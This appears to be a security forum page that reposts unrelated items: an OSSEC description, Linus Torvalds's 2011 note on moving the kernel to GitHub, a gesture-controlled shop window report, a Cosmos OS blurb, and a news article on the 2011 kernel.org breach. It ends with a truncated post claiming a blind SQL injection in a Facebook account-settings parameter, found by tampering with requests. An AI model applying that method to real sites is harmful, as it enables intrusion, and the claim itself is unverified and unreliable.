OSSEC is an Open Source Host-based Intrusion Detection OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX and Windows. A list with all supported platforms is available here. Docs: Documentation Download: http://www.ossec.net/main/downloads

Linux Kernel Moves To Github From Linus Torvalds <> Date Sun, 4 Sep 2011 16:27:25 -0700 Subject Linux 3.1-rc5 So it's been another week, and it's time for another -rc. However, master.kernel.org is still down, and there really hasn't been a ton of development going on, so I considered just skipping a week. But hey, the whole point (well, *one* of the points) of distributed development is that no single place is really any different from any other, so since I did a github account for my divelog thing, why not see how well it holds up to me just putting my whole kernel repo there too? So while kernel.org is down for the count, let's just see how github does: https://github.com/torvalds/linux.git NOTE! One thing to look out for when you see a new random public hosting place usage like that is to verify that yes, it's really the person you think it is. So is it? You can take a few different approaches: (a) Heck, it's open source, I don't care who I pull from, I just want a new kernel, and not having a new update from kernel.org in the last few days, I *really* need my new kernel fix. I'll take it, because I need to exercise my CPU's by building randconfig kernels. Besides, I like living dangerously. ( Yeah, the email looks like it comes from Linus, and we all know that SMTP cannot possibly be spoofed, so it must be him. © Ok, I can fetch that tree, and I know that Linus always does signed tags, and I can verify the 3.1-rc5 tag with Linus known public GPG key that I have somewhere. If it matches, I don't care who the person doing the release announcement is, I'll trust that Linus signed the tree (d) I'll just wait for kernel.org to feel better. Whatever works for you. One thing to note: If you just do git pull https://github.com/torvalds/linux.git you probably won't get the tags, since it's not your origin branch. So do git fetch --tags <...> too, so that you get not only the actual changes, but the tag that you can verify too. And I *would* suggest you just pull into an existing tree, rather than clone a new copy. I bet the github people will appreciate that. Anything worth saying about the changes themselves? The appended shortlog pretty much speaks for itself: there really hasn't been much excitement on the kernel development front. Now, if you want to talk to me about dive logging software, that's a whole different kettle of fish.. Linus Sursa: Linux Kernel Moves To Github - Slashdot Info: https://lkml.org/lkml/2011/9/4/92

Window shopping goes high tech with gesture recognition The Fraunhofer Institute's interactive shop window lets people use gestures to learn more about products on display German researchers have given a new meaning to window shopping. At the IFA consumer electronics show in Berlin the Fraunhofer Heinrich Hertz Institute showed a prototype that lets shoppers learn more about what's in a store display window when the store is closed. Called the Interactive Shop Window the system consists of a flat screen monitor and a motion tracker positioned behind the glass of a store's front window. When window-shoppers stand in front of the window, they can point at a product they want. Then the display box holding the product will light up and information for the object will be shown on the screen. Window-shoppers can then view it in different colors or sizes, or learn more about it. The system is controlled by the window-shopper's gestures, which are captured using motion tracking technology that the Fraunhofer team has been working on for a decade. The institute is looking for partners to further the technology and one day change the look of department store windows. "We're searching for partners in the industry to bring it as a new product," said Paul Chojacki, in charge of interactive media for the Fraunhofer Heinrich Hertz Institute. "We have some bigger companies in Germany who are interested in this," he said, although he didn't say which ones. Before the system is ready for a commercial debut there are still some bugs that need to be worked out. For example, the pointer will sometimes jump around the screen, or something will be selected that wasn't intended. Chojacki said one of the biggest challenges was making sure the motion tracking system filtered out reflections on the store front glass. "The window is a problem for us because it's reflecting light and pictures," he said. "We found a solution that is working very well right now." Another problem for the team will be teaching passers by how to use the system because it isn't all that intuitive. Users have to stand in exactly the right spot and make gestures in a defined area for the motion tracker to see them. Chojacki said that the Fraunhofer motion tracker could be replaced by a Microsoft Kinect sensor, but that theirs is specially tailored for the project. Fraunhofer has been working on its motion tracker well before the Kinect premiered, and has shown it at previous IFA shows. In 2008 it was used in the iPointPresenter project, which allowed users to control a mouse cursor using gestures. At the time it could only track objects on a 2D plane. In 2009 the team upgraded the system for the iPoint3D project that recognized gestures on the X, Y and Z axes. Chojacki was also involved with iPoint3D. Sursa si video: Window shopping goes high tech with gesture recognition - webcams, retail, popular science, peripherals, monitors, Input devices, industry verticals, IFA, Fraunhofer Heinrich Hertz Institute - Techworld

Cosmos - C# Open Source Managed Operating System Welcome to the Cosmos home page. Cosmos is an operating system project implemented completely in CIL compliant languages. The team is committed to using C#, however any .NET language can be used. Latest News Aug 3, 2010 - MS5 is here! Why Cosmos? Because its fun! Do we need any more reasons? Well if you do, here are a list of many real world scenarios we envision. How does Cosmos work? Cosmos includes a compiler (IL2CPU, which is part of Cosmos) that reads the input file (usually the shell) and Cosmos libraries and compiles the resulting IL to x86 code. IL2CPU has a layer for cross platform and we plan to support other processors and platforms, including x64. IL2CPU also supports certain extension methods which allow C# code to interact directly with the CPU, registers, and ports in the kernel. IL2CPU contains some inline assembler, but there are no ASM files that need to be linked in. Currently IL2CPU first outputs raw asm files (with IL comments) and then processes them through nasm (a free assembler). Later we plan to emit directly to binary. For more information with pretty pictures please read this article at CodeProject. Sursa: Cosmos - Cosmos Getting started: Getting Started - Cosmos

Buffer overflows - au aparut acum 20 de ani. Nu mai au actualitate?

Cred ca saptamana viitoare se va face putina ordine intre VIPi.

Kernel.org Attackers May Have Slipped Up A se vedea: https://threatpost.com/en_us/blogs/kernelorg-linux-site-compromised-083111 The attack that compromised some high-value servers belonging to kernel.org--but not the Linux kernel source code--may have been the work of hackers who simply got lucky and didn't realize the value of the servers that they had gotten their hands on. The attack, in short, could have been far worse. Researchers who have talked with the kernel.org staff about some of the details of the attack said that none of it sounds as if the attackers necessarily knew what they had stumbled upon or what damage they could have potentially caused. The attackers made a couple of mistakes that enabled the administrators at kernel.org to discover the breach and stop it before any major damage occurred. First, they used a known Linux rootkit called Phalanx that the admins were able to detect. And second, the attackers set up SSH backdoors on the compromised servers, which the admins also discovered. Had the hackers been specifically targeting the kernel.org servers, the attack probably would've looked quite different. "It really does seem that the attackers didn't know what boxes they were on. It's the same kind of techniques that you'd use on any random Linux boxes," said Jon Oberheide, a security researcher and co-founder of Duo Security. "That often happens in an automated or semi-automated way. They compromised some credentials, got onto one box, moved to another one and so on. It's likely that they got onto one machine, had some credentials that they could use on another box and kind of went from there." The attack on kernel.org, which is the main distribution point for the Linux kernel source code, was discovered on Aug. 29 by administrators who noticed some odd error messages and began investigating. What they eventually found was that sometime in mid-August--likely around Aug.12--an attacker got access to one of the kernel.org servers and inserted a Trojan startup script. They also loaded the Phalanx rootkit and remote SSH backdoors. If the attackers had known they were going after the Linux kernel source code to begin with, Oberheide said, some of those tactics wouldn't have made any sense. "That off-the-shelf rootkit is how the admins noticed the attack. They saw these weird error messages. If it was tailored, they wouldn't have seen any log messages," he said. "If you were really trying to backdoor the Linux source code, you wouldn't bother with SSH backdoors. You've already reached your goal." Kernel.org staffers said in a message detailing the attack that they don't believe any of the Linux kernel source code was accessed or modified. Sursa: https://threatpost.com/en_us/blogs/kernelorg-attackers-may-have-slipped-090111

Facebook Blind Sql Injection facebook.com account settings update a postdata _user not filtered have sql injection vulnerabilities.Using a Tamper data and watch post and get request server and update request have vulnerable. "Jester, GHoST61, MadHunTeR, SuSKuN, LifeSteaLeR, Prens, Vp" Email: turksistemguvenligi@gmail.com Twitter : @TurkAslanlari Facebook: Türk Aslanlar Friendfeed: Türk Aslanlar Friendfeed: SQL Injection - FriendFeed[Close] Video: http://www.securitytube.net/video/2204 Da...